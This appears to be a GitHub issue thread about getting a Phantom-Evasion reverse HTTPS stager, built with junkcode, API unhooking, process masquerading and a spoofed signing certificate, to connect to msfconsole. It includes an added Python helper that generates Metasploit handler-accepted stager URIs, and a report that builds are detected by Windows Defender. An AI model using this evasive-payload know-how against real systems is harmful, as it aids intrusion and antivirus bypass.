
Won't connect to msfconsole

Open. Jupiops opened this issue 6 years ago • 1 comment

Don't know if I'm doing something wrong, but if I execute this file, the created process consumes 50% of the CPU, yet my msfconsole won't recognise any connections. With reverse_tcp it's just the same.

[+] MODULE DESCRIPTION:

  Pure C reverse httpsstager 
  compatible with metasploit and cobaltstrike beacon
  [>] Local process stage execution type:
   > Thread                          
   > APC                             

  [>] Local Memory allocation type:

   > Virtual_RWX                     
   > Virtual_RW/RX                   
   > Virtual_RW/RWX                  
   > Heap_RWX                        

  [>] AUTOCOMPILE format: exe,dll 


  Press Enter to continue: 

[>] Insert Target architecture (default:x86):x64

[>] Insert LHOST: 192.168.*.***

[>] Insert LPORT: 4444

[>] Insert Exec-method (default:Thread):

[>] Insert Memory allocation type (default:Virtual_RWX):

[>] Insert Junkcode Intesity value (default:10):

[>] Insert Junkcode Frequency value  (default: 10):

[>] Insert Junkcode Reinjection Frequency (default: 0):3

[>] Insert Evasioncode Frequency value  (default: 10):20

[>] Dynamically load windows API? (Y/n):

[>] Add Ntdll api Unhooker? (Y/n):

[>] Masq peb process? (Y/n):

[>] Insert fake process path?(default:C:\windows\system32\notepad.exe):

[>] Insert fake process commandline?(default:empty):

[>] Strip executable? (Y/n):

[>] Use certificate spoofer and sign executable? (Y/n):

[>] Insert url target for certificate spoofer (default:www.windows.com:443):

[>] Insert certificate description (default:Notepad Benchmark Util):

[>] Insert output format (default:exe):

[>] Insert output filename:torpedo

[>] Generating code...

[>] Compiling...

[>] Strip binary...

[>] Sign Executable

[>] Signing torpedo.exe with osslsigncode...

[>] Succeeded


[<>] File saved in Phantom-Evasion folder

[>] Press Enter to continue

Jupiops, Jan 23 '20 21:01
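Before attributing a silent listener to the evasion options, the first thing to establish is whether the stager's request reaches msfconsole at all and whether it is a request the handler will serve. The Metasploit HTTP(S) handler does not accept arbitrary paths: it strips the leading "/", the query string and any character outside the base64url alphabet from the requested resource, takes the 8-bit checksum of what is left, and only answers with a stage when that checksum selects a known mode. The following is an added example, not code from Phantom-Evasion or from Metasploit, for checking a captured request path against that rule and for generating a path the handler would accept. The mode constants are those of Rex::Payloads::Meterpreter::UriChecksum as the editor recalls them (confirm them against the Framework version in use), the assumption is that a stager described as "compatible with metasploit" requests such a checksummed URI, and all sample paths are constructed here.

```python
# Added example, not code from Phantom-Evasion or from Metasploit: a quick
# check of whether a reverse_https stager's request would be recognised by
# the Metasploit HTTP(S) handler. The handler classifies a request by the
# 8-bit checksum of the URI resource (leading "/" removed, query string and
# characters outside the base64url alphabet ignored). The mode constants are
# those of Rex::Payloads::Meterpreter::UriChecksum as recalled by the editor;
# confirm them against the Framework version you run. Sample URIs below are
# constructed for the example.
import random
import string

URI_CHECKSUM_MODES = {
    92: "INITW/INITN: stage request from a Windows or native stager",
    80: "INITP: stage request from a Python stager",
    88: "INITJ: stage request from a Java stager",
    95: "INIT_CONN: first connect of a stageless payload",
    98: "CONN: traffic from an established Meterpreter session",
}

URI_CHARS = string.ascii_letters + string.digits + "_-"  # base64url alphabet


def checksum8(text: str) -> int:
    """Metasploit's checksum8: sum of the byte values modulo 256."""
    return sum(text.encode("ascii")) % 256


def uri_resource(uri: str) -> str:
    """Reduce a request path (or full URL) to what the handler checksums:
    drop scheme and host, the query string, and every character outside
    the base64url alphabet (that also removes the leading "/")."""
    path = uri
    if "://" in path:
        host_and_path = path.split("://", 1)[1]
        path = host_and_path[host_and_path.find("/"):] if "/" in host_and_path else ""
    path = path.split("?", 1)[0]
    return "".join(ch for ch in path if ch in URI_CHARS)


def classify_request(uri: str):
    """Return the handler mode a request URI selects, or None when the
    handler would answer with a 404 instead of a stage."""
    return URI_CHECKSUM_MODES.get(checksum8(uri_resource(uri)))


def generate_stager_uri(target_sum: int = 92, length: int = 5, seed=None) -> str:
    """Build a random resource path whose checksum8 equals target_sum, the
    same trick a stager uses to pick a URI the handler will accept."""
    if length < 2:
        raise ValueError("need at least two characters")
    rng = random.Random(seed)
    while True:
        prefix = "".join(rng.choice(URI_CHARS) for _ in range(length - 1))
        needed = (target_sum - checksum8(prefix)) % 256
        tail = [c for c in URI_CHARS if ord(c) == needed]
        if tail:  # not every residue is reachable with one character; retry
            return "/" + prefix + tail[0]


if __name__ == "__main__":
    # Constructed sample requests, as they would appear in a capture taken
    # where the TLS session terminates (the handler side or a proxy):
    for sample in ("/ttt", "/ttt?x=1", "/index.html", generate_stager_uri(seed=1)):
        print(f"{sample:24s} checksum8={checksum8(uri_resource(sample)):3d} "
              f"-> {classify_request(sample)}")
```

Run `classify_request` on the path the stager actually requests, taken from a capture at the point where TLS terminates. A result of None means the handler would 404 the request regardless of how the binary was compiled; no request at all points at the stager never reaching the listener (wrong LHOST/LPORT, blocked egress, or the generated code not reaching the connect), which is a different problem from the junkcode settings.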

Played around a little with the values and figured out that if you change the "Insert Junkcode" values too much, it will break the reverse_tcp functionality. But all EXEs that have a working reverse_tcp function are detected by Windows Defender on Win10 with all updates. Even if you have an EXE that is not detected by Windows Defender on disk, it will be detected on execution at the latest.

Jupiops, Jan 27 '20 12:01